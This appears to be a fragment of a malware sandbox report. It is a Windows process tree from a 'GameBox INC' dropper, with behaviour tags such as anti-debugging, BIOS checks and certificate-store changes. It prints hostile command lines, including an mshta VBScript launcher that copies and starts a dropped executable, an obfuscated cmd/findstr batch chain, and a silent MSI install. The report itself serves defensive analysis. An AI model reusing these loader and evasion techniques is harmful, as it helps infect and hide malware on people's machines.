C:\Users\Admin\AppData\Roaming\7153870.exe"C:\Users\Admin\AppData\Roaming\7153870.exe"6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5316 -s 23047⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\3533583.exe"C:\Users\Admin\AppData\Roaming\3533583.exe"6⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\2809526.exe"C:\Users\Admin\AppData\Roaming\2809526.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\3620530.exe"C:\Users\Admin\AppData\Roaming\3620530.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\1753705.exe"C:\Users\Admin\AppData\Roaming\1753705.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 24407⤵
- Program crash
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
-
C:\Users\Admin\Documents\lzODcMBQZNC5JRzzMB9EEzGl.exe"C:\Users\Admin\Documents\lzODcMBQZNC5JRzzMB9EEzGl.exe"6⤵
-
-
C:\Users\Admin\Documents\ZBInCtkxp4hLnnaRsIXws06i.exe"C:\Users\Admin\Documents\ZBInCtkxp4hLnnaRsIXws06i.exe"6⤵
-
-
C:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exe"C:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exeC:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exe7⤵
-
-
-
C:\Users\Admin\Documents\CJhUHcHxfICvPKKREKPPk4Bb.exe"C:\Users\Admin\Documents\CJhUHcHxfICvPKKREKPPk4Bb.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\02oLXtu1U1IJhVSt20jm10EV.exe"C:\Users\Admin\Documents\02oLXtu1U1IJhVSt20jm10EV.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\NqmlIGI7TY3dwE9Gw4uXurUH.exe"C:\Users\Admin\Documents\NqmlIGI7TY3dwE9Gw4uXurUH.exe"6⤵
-
-
C:\Users\Admin\Documents\jGg35O1l9wghJXyysFy8Uwi7.exe"C:\Users\Admin\Documents\jGg35O1l9wghJXyysFy8Uwi7.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\a1Xq_jbwcre_prAXvCWXX_tG.exe"C:\Users\Admin\Documents\a1Xq_jbwcre_prAXvCWXX_tG.exe"6⤵
- Drops file in Program Files directory
-
-
C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe" ) do taskkill -f -iM "%~NxA"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "LNmyiwBkxK6HUosZXAjNN6XG.exe"9⤵
- Executes dropped EXE
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\K7p56my92QqHSgkozMCG0nfC.exe"C:\Users\Admin\Documents\K7p56my92QqHSgkozMCG0nfC.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 3207⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\NV0_9lowzg4GYOACtmtMjGu4.exe"C:\Users\Admin\Documents\NV0_9lowzg4GYOACtmtMjGu4.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 256 -s 3167⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\zdTWC7aek9sTreenfaBmkDSm.exe"C:\Users\Admin\Documents\zdTWC7aek9sTreenfaBmkDSm.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 3127⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"6⤵
-
C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\T3N67TUNNjUogZ_9BDQRPjf7.exe"C:\Users\Admin\Documents\T3N67TUNNjUogZ_9BDQRPjf7.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3397192.exe"C:\Users\Admin\AppData\Roaming\3397192.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7660 -s 22528⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\3180045.exe"C:\Users\Admin\AppData\Roaming\3180045.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 24368⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\1757720.exe"C:\Users\Admin\AppData\Roaming\1757720.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\7916684.exe"C:\Users\Admin\AppData\Roaming\7916684.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
-
-
C:\Users\Admin\Documents\7O8PKXnAxyPdFQWPEtiNd_yL.exe"C:\Users\Admin\Documents\7O8PKXnAxyPdFQWPEtiNd_yL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe"C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe"6⤵
-
C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exeC:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe7⤵
-
-
C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exeC:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\hsqxUqb1LUjM5gvq6fJZHFZH.exe"C:\Users\Admin\Documents\hsqxUqb1LUjM5gvq6fJZHFZH.exe"6⤵
-
-
C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"6⤵
-
C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"7⤵
-
-
-
C:\Users\Admin\Documents\lmuTCMXCfuf8hyEUJJMPciVI.exe"C:\Users\Admin\Documents\lmuTCMXCfuf8hyEUJJMPciVI.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2807⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\T7HecCDZomR7Jvn0IhX_IBOT.exe"C:\Users\Admin\Documents\T7HecCDZomR7Jvn0IhX_IBOT.exe"6⤵
- Loads dropped DLL
-
-
C:\Users\Admin\Documents\u2LfDzzWeEg8llmL3rtI7Is9.exe"C:\Users\Admin\Documents\u2LfDzzWeEg8llmL3rtI7Is9.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe"C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe"6⤵
-
C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe"C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe" -q7⤵
-
-
-
C:\Users\Admin\Documents\ysCFU4JxCe8XfaSMA6geAvW4.exe"C:\Users\Admin\Documents\ysCFU4JxCe8XfaSMA6geAvW4.exe"6⤵
-
-
C:\Users\Admin\Documents\9bvp6tgEvkZNIB14ADuzB9aF.exe"C:\Users\Admin\Documents\9bvp6tgEvkZNIB14ADuzB9aF.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DCKSL.tmp\9bvp6tgEvkZNIB14ADuzB9aF.tmp"C:\Users\Admin\AppData\Local\Temp\is-DCKSL.tmp\9bvp6tgEvkZNIB14ADuzB9aF.tmp" /SL5="$601FA,138429,56832,C:\Users\Admin\Documents\9bvp6tgEvkZNIB14ADuzB9aF.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-1TUIB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1TUIB.tmp\Setup.exe" /Verysilent8⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
-
-
-
-
-
-
C:\Users\Admin\Documents\rKsE4nIdcbQ0S81Vh5mPESTM.exe"C:\Users\Admin\Documents\rKsE4nIdcbQ0S81Vh5mPESTM.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmp518C_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp518C_tmp.exe"6⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 792 -ip 7921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3972 -ip 39721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1184 -ip 11841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 960 -ip 9601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1232 -ip 12321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1588 -ip 15881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1172 -ip 11721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 2112 -ip 21121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2488 -ip 24881⤵
